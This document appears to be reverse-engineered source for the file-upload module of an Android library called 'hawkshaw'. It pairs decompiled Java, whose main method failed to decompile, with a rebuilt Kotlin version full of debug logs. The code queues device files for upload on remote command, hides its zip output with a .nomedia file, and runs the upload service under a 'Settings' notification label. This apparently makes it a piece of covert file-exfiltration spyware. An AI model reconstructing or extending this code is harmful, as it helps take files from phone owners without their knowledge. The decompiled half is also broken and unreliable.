File: Dummy/hawkshaw/library/features/media/filecrud/FileUploadKt.java
package com.hawkshaw.library.features.media.filecrud;

import O1.C0071a;
import O1.c;
import W2.y;
import X1.B;
import a3.e;
import android.content.Context;
import android.content.Intent;
import android.os.Environment;
import b3.C0298a;
import com.hawkshaw.library.App;
import com.hawkshaw.library.datalayer.models.Command;
import com.hawkshaw.library.utils.MiscKt;
import i.C0528x;
import java.io.File;
import java.text.SimpleDateFormat;
import java.util.Locale;
import t3.N;

public final class FileUploadKt {
    private static final String FILENAME_FORMAT = "yyyy-MM-dd_HH-mm-ss-SSS";
    private static final String TAG = "FileUpload";

    private static final String getFileNameDate() {
        return new SimpleDateFormat(FILENAME_FORMAT, Locale.getDefault()).format(Long.valueOf(System.currentTimeMillis()));
    }

    public static final File getOutZipPath() {
        File externalStoragePublicDirectory = Environment.getExternalStoragePublicDirectory(".zip");
        File externalFilesDir = App.Companion.getContext().getExternalFilesDir(".zip");
        if (externalFilesDir != null) {
            externalStoragePublicDirectory = externalFilesDir;
        }
        if (!externalStoragePublicDirectory.exists()) {
            externalStoragePublicDirectory.mkdirs();
        }
        File file = new File(externalStoragePublicDirectory, ".nomedia");
        if (!file.exists()) {
            file.createNewFile();
        }
        File file2 = new File(externalStoragePublicDirectory, C0528x.c(getFileNameDate(), ".zip"));
        file2.createNewFile();
        return file2;
    }

    public static final Object pushFile(Command.FileRequest fileRequest, e eVar) {
        Object B4 = B.B(N.f9292c, new C0071a(fileRequest, (e) null), eVar);
        return B4 == C0298a.f4140D ? B4 : y.f2418a;
    }

    /* JADX WARNING: type inference failed for: r1v4, types: [c3.c] */
    /* access modifiers changed from: private */
    /* JADX WARNING: Multi-variable type inference failed */
    /* JADX WARNING: Removed duplicated region for block: B:12:0x0033  */
    /* JADX WARNING: Removed duplicated region for block: B:8:0x0025  */
    /* Code decompiled incorrectly, please refer to instructions dump. */
    public static final java.lang.Object pushFileService(com.hawkshaw.library.datalayer.models.Command.FileRequest r27, a3.e r28) {
        /*
            r0 = r28
            boolean r1 = r0 instanceof O1.b
            if (r1 == 0) goto L_0x0015
            r1 = r0
            O1.b r1 = (O1.b) r1
            int r2 = r1.f1487E
            r3 = -2147483648(0xffffffff80000000, float:-0.0)
            r4 = r2 & r3
            if (r4 == 0) goto L_0x0015
            int r2 = r2 - r3
            r1.f1487E = r2
            goto L_0x001a
        L_0x0015:
            O1.b r1 = new O1.b
            r1.<init>(r0)
        L_0x001a:
            java.lang.Object r0 = r1.f1486D
            b3.a r2 = b3.C0298a.f4140D
            int r3 = r1.f1487E
            W2.y r4 = W2.y.f2418a
            r5 = 1
            if (r3 == 0) goto L_0x0033
            if (r3 != r5) goto L_0x002b
            Y1.C0110h.P(r0)
            goto L_0x0095
        L_0x002b:
            java.lang.IllegalStateException r0 = new java.lang.IllegalStateException
            java.lang.String r1 = "call to 'resume' before 'invoke' with coroutine"
            r0.<init>(r1)
            throw r0
        L_0x0033:
            Y1.C0110h.P(r0)
            java.io.File r0 = new java.io.File
            java.lang.String r3 = r27.getPath()
            r0.<init>(r3)
            boolean r0 = r0.isFile()
            if (r0 != 0) goto L_0x005e
            com.hawkshaw.library.logger.Logger r6 = com.hawkshaw.library.logger.Logger.INSTANCE
            java.lang.String r0 = r27.getPath()
            java.lang.String r1 = "PushFile: "
            java.lang.String r2 = " is not a file, aborting upload"
            java.lang.String r8 = i.C0528x.d(r1, r0, r2)
            r11 = 12
            r12 = 0
            java.lang.String r7 = "FileUpload"
            r9 = 0
            r10 = 0
            com.hawkshaw.library.logger.Logger.e$default(r6, r7, r8, r9, r10, r11, r12)
            return r4
        L_0x005e:
            com.hawkshaw.library.datalayer.room.files.PushFileTaskEntity r0 = new com.hawkshaw.library.datalayer.room.files.PushFileTaskEntity
            java.lang.String r14 = r27.getPath()
            com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r15 = r27.getSource()
            com.hawkshaw.library.datalayer.models.Command$FileRequest$Medium r16 = r27.getMedium()
            int r17 = r27.getBuffer()
            r25 = 240(0xf0, float:3.36E-43)
            r26 = 0
            r18 = 0
            r20 = 0
            r22 = 0
            r24 = 0
            r13 = r0
            r13.<init>(r14, r15, r16, r17, r18, r20, r22, r24, r25, r26)
            com.hawkshaw.library.datalayer.room.AppDatabase r3 = com.hawkshaw.library.datalayer.room.AppDatabaseKt.getDb()
            com.hawkshaw.library.datalayer.room.files.PushFileTaskDao r3 = r3.pushFileTaskDao()
            com.hawkshaw.library.datalayer.room.files.PushFileTaskEntity[] r0 = new com.hawkshaw.library.datalayer.room.files.PushFileTaskEntity[]{r0}
            r1.f1487E = r5
            java.lang.Object r0 = r3.insert(r0, r1)
            if (r0 != r2) goto L_0x0095
            return r2
        L_0x0095:
            startPushFileService()
            return r4
        */
        throw new UnsupportedOperationException("Method not decompiled: com.hawkshaw.library.features.media.filecrud.FileUploadKt.pushFileService(com.hawkshaw.library.datalayer.models.Command$FileRequest, a3.e):java.lang.Object");
    }

    public static final Object pushFiles(Command.FilesRequest filesRequest, e eVar) {
        Object B4 = B.B(N.f9292c, new c(filesRequest, (e) null), eVar);
        return B4 == C0298a.f4140D ? B4 : y.f2418a;
    }

    public static final void startPushFileService() {
        MiscKt.startService$default(new Intent(App.Companion.getContext(), PushFileManagerService.class), (String) null, (String) null, (Context) null, 14, (Object) null);
    }
}

File: app/src/main/java/com/hawkshaw/library/features/media/filecrud/FileUploadKt.kt
package com.hawkshaw.library.features.media.filecrud

import android.content.Intent
import android.os.Environment
import android.util.Log // Added for Android logging
import com.hawkshaw.library.App
import com.hawkshaw.library.datalayer.models.Command
import com.hawkshaw.library.datalayer.room.AppDatabaseKt
import com.hawkshaw.library.datalayer.room.files.PushFileTaskEntity
import com.hawkshaw.library.logger.Logger
import com.hawkshaw.library.utils.MiscKt
import kotlinx.coroutines.Dispatchers
import kotlinx.coroutines.withContext
import java.io.File
import java.text.SimpleDateFormat
import java.util.Locale

private const val FILENAME_FORMAT = "yyyy-MM-dd_HH-mm-ss-SSS"
private const val TAG = "FileUpload"

/**
 * Get formatted date string for file naming
 */
private fun getFileNameDate(): String {
    Log.d(TAG, "[DEBUG] getFileNameDate called.")
    val formattedDate = SimpleDateFormat(FILENAME_FORMAT, Locale.getDefault()).format(System.currentTimeMillis())
    Log.d(TAG, "[DEBUG] getFileNameDate: Generated formatted date: $formattedDate")
    return formattedDate
}

/**
 * Get a path for zip file output
 */
fun getOutZipPath(): File {
    Log.d(TAG, "[DEBUG] getOutZipPath called.")
    var directory = Environment.getExternalStoragePublicDirectory(".zip")
    Log.d(TAG, "[DEBUG] getOutZipPath: Initial public directory: ${directory.absolutePath}")
    val externalFilesDir = App.getContext().getExternalFilesDir(".zip")
    Log.d(TAG, "[DEBUG] getOutZipPath: App's external files directory: ${externalFilesDir?.absolutePath}")

    // Prefer the app's external files directory if available
    if (externalFilesDir != null) {
        Log.d(TAG, "[DEBUG] getOutZipPath: Using app's external files directory.")
        directory = externalFilesDir
    } else {
        Log.d(TAG, "[DEBUG] getOutZipPath: App's external files directory is null, using public directory.")
    }
    Log.d(TAG, "[DEBUG] getOutZipPath: Selected directory for zip: ${directory.absolutePath}")

    // Ensure directory exists
    if (!directory.exists()) {
        Log.d(TAG, "[DEBUG] getOutZipPath: Directory does not exist. Creating directory: ${directory.absolutePath}")
        directory.mkdirs()
    }

    // Create .nomedia file to hide media from gallery apps
    val nomediaFile = File(directory, ".nomedia")
    if (!nomediaFile.exists()) {
        Log.d(TAG, "[DEBUG] getOutZipPath: .nomedia file does not exist. Creating: ${nomediaFile.absolutePath}")
        nomediaFile.createNewFile() // Consider adding error handling for createNewFile
    }

    // Create and return the zip file
    val zipFileName = "${getFileNameDate()}.zip"
    val zipFile = File(directory, zipFileName)
    Log.d(TAG, "[DEBUG] getOutZipPath: Attempting to create zip file: ${zipFile.absolutePath}")
    zipFile.createNewFile() // Consider adding error handling for createNewFile
    Log.d(TAG, "[DEBUG] getOutZipPath: Zip file created successfully: ${zipFile.absolutePath}")
    return zipFile
}

/**
 * Push a file to be uploaded
 */
suspend fun pushFile(fileRequest: Command.FileRequest): Any = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] pushFile called with FileRequest: $fileRequest")
    // Start the push file service with the file request
    val result = pushFileService(fileRequest)
    Log.d(TAG, "[DEBUG] pushFile: pushFileService returned. Result: $result (Unit expected for successful queueing)")
    return@withContext result
}

/**
 * Store file metadata in the database and start the upload service
 */
private suspend fun pushFileService(fileRequest: Command.FileRequest): Any = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] pushFileService called with FileRequest: $fileRequest")
    val file = File(fileRequest.path)
    Log.d(TAG, "[DEBUG] pushFileService: Checking file at path: ${fileRequest.path}")

    // Verify that the file exists
    if (!file.isFile) {
        Log.e(TAG, "[DEBUG] pushFileService: Path ${fileRequest.path} is not a file or does not exist. Aborting upload.")
        // Existing Logger.e is appropriate here.
        Logger.e(
            TAG,
            "PushFile: ${fileRequest.path} is not a file, aborting upload",
            b = false,
            i = 12,
            nothing = null
        )
        return@withContext Unit // Explicitly returning Unit as per original logic for this case
    }
    Log.d(TAG, "[DEBUG] pushFileService: File ${fileRequest.path} exists and is a file.")

    // Create task entity for the file
    val pushFileTask = PushFileTaskEntity(
        path = fileRequest.path,
        source = fileRequest.source,
        medium = fileRequest.medium,
        buffer = fileRequest.buffer
    )
    Log.d(TAG, "[DEBUG] pushFileService: Created PushFileTaskEntity: $pushFileTask")

    // Insert the task into the database
    Log.d(TAG, "[DEBUG] pushFileService: Getting database instance.")
    val db = AppDatabaseKt.db
    Log.d(TAG, "[DEBUG] pushFileService: Inserting PushFileTaskEntity into database.")
    db.pushFileTaskDao().insert(pushFileTask)
    Log.d(TAG, "[DEBUG] pushFileService: PushFileTaskEntity inserted into database.")

    // Start the service to handle the upload
    Log.d(TAG, "[DEBUG] pushFileService: Calling startPushFileService().")
    startPushFileService()

    Log.d(TAG, "[DEBUG] pushFileService completed for path: ${fileRequest.path}")
    return@withContext Unit // Explicitly returning Unit
}

/**
 * Push multiple files to be uploaded
 */
suspend fun pushFiles(filesRequest: Command.FilesRequest): Any = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] pushFiles called with FilesRequest: $filesRequest")
    // Process the files request and start the upload service
    // This would typically involve:
    // 1. Verifying all files exist
    // 2. Creating task entities for each file
    // 3. Inserting tasks into the database
    // 4. Starting the service to handle uploads
    Log.d(TAG, "[DEBUG] pushFiles: Current implementation only starts the service. Add more logs if file processing logic is added here.")

    startPushFileService()
    Log.d(TAG, "[DEBUG] pushFiles: startPushFileService called.")
    return@withContext Unit // Explicitly returning Unit
}

/**
 * Synchronize file uploads (process any pending uploads)
 */
fun syncPushFiles() {
    Log.d(TAG, "[DEBUG] syncPushFiles called.")
    startPushFileService()
    Log.d(TAG, "[DEBUG] syncPushFiles: startPushFileService called.")
}

/**
 * Start the service responsible for managing file uploads
 */
fun startPushFileService() {
    Log.d(TAG, "[DEBUG] startPushFileService called.")
    val intent = Intent(App.getContext(), PushFileManagerService::class.java)
    Log.d(TAG, "[DEBUG] startPushFileService: Created Intent for PushFileManagerService: $intent")
    // Existing MiscKt.startService is a library call, logging before it is good.
    MiscKt.startService(intent, "Settings", "Uploading files...", App.getContext())
    Log.d(TAG, "[DEBUG] startPushFileService: MiscKt.startService called for PushFileManagerService.")
}
